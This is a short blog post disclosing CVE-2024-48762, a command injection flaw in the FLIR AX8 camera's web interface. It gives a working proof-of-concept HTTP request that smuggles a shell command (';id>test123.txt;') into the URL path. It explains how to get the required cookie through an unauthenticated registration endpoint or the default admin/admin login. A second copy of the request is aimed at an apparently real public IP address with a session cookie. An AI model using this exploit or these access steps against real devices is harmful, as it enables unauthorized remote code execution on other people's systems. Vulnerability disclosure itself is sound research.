CVE-2024-48762

CVE-2024-48762

Description

Command injection vulnerability in /usr/www/application/models/settingscamera.php in FLIR AX8 up to 1.46.16 allows attackers to run arbitrary commands via the value parameter.

Note:

This vulnerability is a backend issue that requires obtaining cookies. It can exploit the unauthorized access vulnerability for arbitrary user registration found at /tools/test_login.php?action=register. After registering a new user, cookies can be obtained to achieve RCE (Remote Code Execution).

Also.Under normal circumstances, it has a weak password vulnerability with default account credentials being ‘admin’ for both user and password too. You can also obtain a cookie through this method.

POC

1
2
3
4
5
6
7
8
9
10
GET /settings/applyfirmware/;id>test123.txt;/false HTTP/1.1
Host: XXXX
Priority: u=0, i
Accept-Encoding: gzip, deflate
Referer: XXXX
Cookie: XXXX
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

For example

  • this cookie must be changed
1
2
3
4
5
6
7
8
9
10
GET /settings/applyfirmware/;id>test123.txt;/false HTTP/1.1
Host: 222.103.211.89:8004
Priority: u=0, i
Accept-Encoding: gzip, deflate
Referer: http://222.103.211.89:8004/
Cookie: theme=light; distanceUnit=metric; temperatureUnit=celsius; showCameraId=false; clientTimeZoneOffset=-480; clientTimeZoneDST=0; PHPSESSID=fede7f79f208effcb87474d02fe6d53d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0

Response

1
2
3
4
5
6
7
8
HTTP/1.1 200 OK
X-Powered-By: PHP/5.4.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Date: Mon, 11 Feb 2002 09:18:49 GMT
Server: lighttpd/1.4.33

image-1

image-20241002225635281

CVE
#CVE
CVE-2024-48762
https://xu17.top/2024/10/17/CVE-2024-48762/
作者
XU17
发布于
2024年10月17日
许可协议
XU17